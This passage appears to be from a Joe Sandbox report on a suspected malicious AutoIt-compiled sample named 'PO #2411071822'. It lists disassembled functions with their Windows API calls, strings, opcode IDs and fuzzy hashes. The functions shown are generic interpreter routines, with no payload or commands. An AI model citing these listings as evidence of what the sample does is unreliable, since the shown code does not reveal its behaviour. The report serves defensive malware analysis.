                                                                                                              • Instruction Fuzzy Hash: 71A1BF702042459BDB15EF21C851ABBB3A1FF85314F11896EF9965B3E2DB38EC06CB46
                                                                                                              Function 0041CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0041CF91
                                                                                                              • __swprintf.LIBCMT ref: 0041D032
                                                                                                              • _wcscmp.LIBCMT ref: 0041D045
                                                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0041D09A
                                                                                                              • _wcscmp.LIBCMT ref: 0041D0D6
                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0041D10D
                                                                                                              • GetDlgCtrlID.USER32(?), ref: 0041D15F
                                                                                                              • GetWindowRect.USER32(?,?), ref: 0041D195
                                                                                                              • GetParent.USER32(?), ref: 0041D1B3
                                                                                                              • ScreenToClient.USER32(00000000), ref: 0041D1BA
                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0041D234
                                                                                                              • _wcscmp.LIBCMT ref: 0041D248
                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0041D26E
                                                                                                              • _wcscmp.LIBCMT ref: 0041D282
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                              • String ID: %s%u
                                                                                                              • API String ID: 3119225716-679674701
                                                                                                              • Opcode ID: 9bb50d50f648337d89ecab623aec1c74176a99c53e3106e5ca2059192b3e2dbe
                                                                                                              • Instruction ID: 5a1688fe307c069b06a2015af674610e4d043d4fb7087c0e10e0b601a30799ad
                                                                                                              • Opcode Fuzzy Hash: 9bb50d50f648337d89ecab623aec1c74176a99c53e3106e5ca2059192b3e2dbe
                                                                                                              • Instruction Fuzzy Hash: BBA1B5B1A04302AFD715DF64C884FEBB7A8FF44354F00452AF969D2290D778EA85CB99
                                                                                                              Function 0041D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0041D8EB
                                                                                                              • _wcscmp.LIBCMT ref: 0041D8FC
                                                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0041D924
                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0041D941
                                                                                                              • _wcscmp.LIBCMT ref: 0041D95F
                                                                                                              • _wcsstr.LIBCMT ref: 0041D970
                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0041D9A8
                                                                                                              • _wcscmp.LIBCMT ref: 0041D9B8
                                                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0041D9DF
                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0041DA28
                                                                                                              • _wcscmp.LIBCMT ref: 0041DA38
                                                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0041DA60
                                                                                                              • GetWindowRect.USER32(00000004,?), ref: 0041DAC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                              • String ID: @$ThumbnailClass
                                                                                                              • API String ID: 1788623398-1539354611
                                                                                                              • Opcode ID: 04aee282535ef809687832b7cf74eb006e13667e9fb6b2c7994df2d413512f7a
                                                                                                              • Instruction ID: fa408dbf2db2bc85bf46f30f9b6fe837d90bb564442ca044d92fd474e11595f1
                                                                                                              • Opcode Fuzzy Hash: 04aee282535ef809687832b7cf74eb006e13667e9fb6b2c7994df2d413512f7a
                                                                                                              • Instruction Fuzzy Hash: 5F81D3B19083459BDB05CF10C881FAB7BE8EF44344F04446BFD8A9A195DB78ED85CBA9
                                                                                                              Function 0041D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __wcsnicmp
                                                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                              • API String ID: 1038674560-1810252412
                                                                                                              • Opcode ID: 34aaaa6ba5d897def1218184cd7bea7893b7edf20c54adeeba270f734e6aeaba
                                                                                                              • Instruction ID: 3075fb89cb5ff20622f54ecac8c093d2d6fd4de14cf87482d40a9531608b201c
                                                                                                              • Opcode Fuzzy Hash: 34aaaa6ba5d897def1218184cd7bea7893b7edf20c54adeeba270f734e6aeaba
                                                                                                              • Instruction Fuzzy Hash: CE31CE71A44255BADF15FE11CE43FEEB7A49F20344F30023BF421750D1EBA9AA44C669
                                                                                                              Function 0041EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadIconW.USER32(00000063), ref: 0041EAB0
                                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0041EAC2
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 0041EAD9
                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 0041EAEE
                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0041EAF4
                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041EB04
                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0041EB0A
                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0041EB2B
                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0041EB45
                                                                                                              • GetWindowRect.USER32(?,?), ref: 0041EB4E
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 0041EBB9
                                                                                                              • GetDesktopWindow.USER32 ref: 0041EBBF
                                                                                                              • GetWindowRect.USER32(00000000), ref: 0041EBC6
                                                                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0041EC12
                                                                                                              • GetClientRect.USER32(?,?), ref: 0041EC1F
                                                                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0041EC44
                                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0041EC6F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                              • String ID:
                                                                                                              • API String ID: 3869813825-0
                                                                                                              • Opcode ID: fa767984c016168e11a07c472122d64acd6781c08bf6aa59bdba0659deab3c4c
                                                                                                              • Instruction ID: dfbb39a5fd6f489b4dd909a84358be82f39fc6df2ca200e6644777d7fe3e063f
                                                                                                              • Opcode Fuzzy Hash: fa767984c016168e11a07c472122d64acd6781c08bf6aa59bdba0659deab3c4c
                                                                                                              • Instruction Fuzzy Hash: B9513C75A00709AFDB20DFA9CD89BAFBBF5FF04705F004929E546A26A0D7B4B944CB14
                                                                                                              Function 004379B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 004379C6
                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004379D1
                                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 004379DC
                                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 004379E7
                                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 004379F2
                                                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 004379FD
                                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00437A08
                                                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00437A13
                                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00437A1E
                                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00437A29
                                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00437A34
                                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00437A3F
                                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00437A4A
                                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00437A55
                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00437A60
                                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00437A6B
                                                                                                              • GetCursorInfo.USER32(?), ref: 00437A7B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Cursor$Load$Info
                                                                                                              • String ID:
                                                                                                              • API String ID: 2577412497-0
                                                                                                              • Opcode ID: edb6d1075366315cdaf9cd5f15b81f898825fd2843663a9c38d0e8c495391db3
                                                                                                              • Instruction ID: 4dde3a18869a9a2874d8a803f41279638d40875e3ee06f30bfdb7091b3104bc1
                                                                                                              • Opcode Fuzzy Hash: edb6d1075366315cdaf9cd5f15b81f898825fd2843663a9c38d0e8c495391db3
                                                                                                              • Instruction Fuzzy Hash: 7B3117B0D0831EAADB609FB68C8995FBFE8FF08750F504527E54DE7280DA78A5008F95
                                                                                                              Function 003EC833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,003EC8B7,?,00002000,?,?,00000000,?,003E419E,?,?,?,0047DC00), ref: 003FE984
                                                                                                                • Part of subcall function 003E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003E53B1,?,?,003E61FF,?,00000000,00000001,00000000), ref: 003E662F
                                                                                                              • __wsplitpath.LIBCMT ref: 003EC93E
                                                                                                                • Part of subcall function 00401DFC: __wsplitpath_helper.LIBCMT ref: 00401E3C
                                                                                                              • _wcscpy.LIBCMT ref: 003EC953
                                                                                                              • _wcscat.LIBCMT ref: 003EC968
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 003EC978
                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 003ECABE
                                                                                                                • Part of subcall function 003EB337: _wcscpy.LIBCMT ref: 003EB36F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                              • API String ID: 2258743419-1018226102
                                                                                                              • Opcode ID: a6987f3d6ecdbbd7a2d1dd75a4dddd15a3eb937ff37cca4514844a03a24a3d00
                                                                                                              • Instruction ID: 37ea27bcc00bec48e19457e1de7a15477149a8654a7b1151cbc3af7ae3ea9caf
                                                                                                              • Opcode Fuzzy Hash: a6987f3d6ecdbbd7a2d1dd75a4dddd15a3eb937ff37cca4514844a03a24a3d00
                                                                                                              • Instruction Fuzzy Hash: 6B12F4315083819FC725EF25C841AAFBBE4BF89344F40492EF98997292DB34DA49CB57
                                                                                                              Function 0044CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 0044CEFB
                                                                                                              • DestroyWindow.USER32(?,?), ref: 0044CF73
                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0044CFF4
                                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0044D016
                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0044D025
                                                                                                              • DestroyWindow.USER32(?), ref: 0044D042
                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,003E0000,00000000), ref: 0044D075
                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0044D094
                                                                                                              • GetDesktopWindow.USER32 ref: 0044D0A9
                                                                                                              • GetWindowRect.USER32(00000000), ref: 0044D0B0
                                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0044D0C2
                                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0044D0DA
                                                                                                                • Part of subcall function 003FB526: GetWindowLongW.USER32(?,000000EB), ref: 003FB537
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                                              • String ID: 0$tooltips_class32
                                                                                                              • API String ID: 3877571568-3619404913
                                                                                                              • Opcode ID: 89ff65f8ed82bef92850659c7dc90e980775e96efe0beb60dbb1e7362837277c
                                                                                                              • Instruction ID: 6aeb2667c8ee63140b73589a43c67bd6051a20e48194f73137f2bb1beb3f11a8
                                                                                                              • Opcode Fuzzy Hash: 89ff65f8ed82bef92850659c7dc90e980775e96efe0beb60dbb1e7362837277c
                                                                                                              • Instruction Fuzzy Hash: 6571AFB0940305AFE721CF28CC85F677BE5EB89708F14452EF985872A1D778E942CB1A
                                                                                                              Function 0044F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003FB34E: GetWindowLongW.USER32(?,000000EB), ref: 003FB35F
                                                                                                              • DragQueryPoint.SHELL32(?,?), ref: 0044F37A
                                                                                                                • Part of subcall function 0044D7DE: ClientToScreen.USER32(?,?), ref: 0044D807
                                                                                                                • Part of subcall function 0044D7DE: GetWindowRect.USER32(?,?), ref: 0044D87D
                                                                                                                • Part of subcall function 0044D7DE: PtInRect.USER32(?,?,0044ED5A), ref: 0044D88D
                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0044F3E3
                                                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0044F3EE
                                                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0044F411
                                                                                                              • _wcscat.LIBCMT ref: 0044F441
                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044F458
                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0044F471
                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0044F488
                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0044F4AA
                                                                                                              • DragFinish.SHELL32(?), ref: 0044F4B1
                                                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0044F59C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                              • API String ID: 169749273-3440237614
                                                                                                              • Opcode ID: ac900817cdeb5e57e26e4a2441a007fa4b86437813048f71b36a1edf472b544a
                                                                                                              • Instruction ID: 2c714fd7ee0c7af93f7b3faf477d21591f852e612f57d713440875a9b1744ae6
                                                                                                              • Opcode Fuzzy Hash: ac900817cdeb5e57e26e4a2441a007fa4b86437813048f71b36a1edf472b544a
                                                                                                              • Instruction Fuzzy Hash: 13615971508300AFD701EF65CC85EAFBBE8EF89714F000A2EF695961A1DB749A09CB56
                                                                                                              Function 0042AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0042AB3D
                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0042AB46
                                                                                                              • VariantClear.OLEAUT32(?), ref: 0042AB52
                                                                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0042AC40
                                                                                                              • __swprintf.LIBCMT ref: 0042AC70
                                                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 0042AC9C
                                                                                                              • VariantInit.OLEAUT32(?), ref: 0042AD4D
                                                                                                              • SysFreeString.OLEAUT32(00000016), ref: 0042ADDF
                                                                                                              • VariantClear.OLEAUT32(?), ref: 0042AE35
                                                                                                              • VariantClear.OLEAUT32(?), ref: 0042AE44
                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0042AE80
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                              • API String ID: 3730832054-3931177956
                                                                                                              • Opcode ID: 1d429acd6c0bf4d786ace32b4b6f172d6d52bf38d768347f9dcccc99abfe5190
                                                                                                              • Instruction ID: fb9bdd8d983d7fe63329982772168c87492f14785bff816b9a6817d67efe1c4b
                                                                                                              • Opcode Fuzzy Hash: 1d429acd6c0bf4d786ace32b4b6f172d6d52bf38d768347f9dcccc99abfe5190
                                                                                                              • Instruction Fuzzy Hash: D0D1F531B00125DBDB109F56E884B6ABBB5FF04700F588497ED159B280DB78EC61DBAB
                                                                                                              Function 0044716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 004471FC
                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00447247
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                              • API String ID: 3974292440-4258414348
                                                                                                              • Opcode ID: 1a4ff7691ccacab3446e4da8ec955902cbb2b3d3ac30a35259e6fb5764b8e912
                                                                                                              • Instruction ID: c22b0208fa1684fe994e7e4d5264e1daa3be2d2753740f882347abfd3d457d34
                                                                                                              • Opcode Fuzzy Hash: 1a4ff7691ccacab3446e4da8ec955902cbb2b3d3ac30a35259e6fb5764b8e912
                                                                                                              • Instruction Fuzzy Hash: 779191342046459BDB05EF10C891A6EB7A1BF94314F00486EF9965B3E3DB78ED47CB89
                                                                                                              Function 0041CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EnumChildWindows.USER32(?,0041CF50), ref: 0041CE90
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ChildEnumWindows
                                                                                                              • String ID: 4+I$CLASS$CLASSNN$H+I$INSTANCE$L+I$NAME$P+I$REGEXPCLASS$T+I$TEXT
                                                                                                              • API String ID: 3555792229-2131382867
                                                                                                              • Opcode ID: a84e79e1e94cd97c51861d60790fdff8a7ad42f87f6848a06c28301d07f25297
                                                                                                              • Instruction ID: b5a7f015cfcc5a60e994aa7b5e5434ce91ca395f09d49de4bf5d13a2a3d973d2
                                                                                                              • Opcode Fuzzy Hash: a84e79e1e94cd97c51861d60790fdff8a7ad42f87f6848a06c28301d07f25297
                                                                                                              • Instruction Fuzzy Hash: 0191A430640646ABCB19DF60C8C1BEAFB75BF04340F50852BE559A7291DF34799ACBD8
                                                                                                              Function 0044E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0044E5AB
                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0044BEAF), ref: 0044E607
                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0044E647
                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0044E68C
                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0044E6C3
                                                                                                              • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0044BEAF), ref: 0044E6CF
